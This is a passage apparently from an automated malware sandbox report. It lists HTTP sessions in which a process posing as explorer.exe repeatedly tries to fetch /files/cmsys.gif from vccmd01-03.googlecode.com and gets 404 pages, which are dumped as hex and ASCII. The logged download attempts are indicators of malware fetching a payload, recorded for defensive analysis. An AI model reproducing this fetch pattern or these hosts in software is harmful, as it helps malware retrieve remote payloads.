6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49709	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:24.355314016 CEST	907	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd02.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:24.402906895 CEST	908	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:24 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49711	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:26.571388006 CEST	917	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd03.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:26.618937969 CEST	919	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:26 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49712	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:33.931504011 CEST	931	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd01.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:33.979254007 CEST	933	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:33 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49718	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:37.755568027 CEST	996	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd02.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:37.802733898 CEST	1013	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:37 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 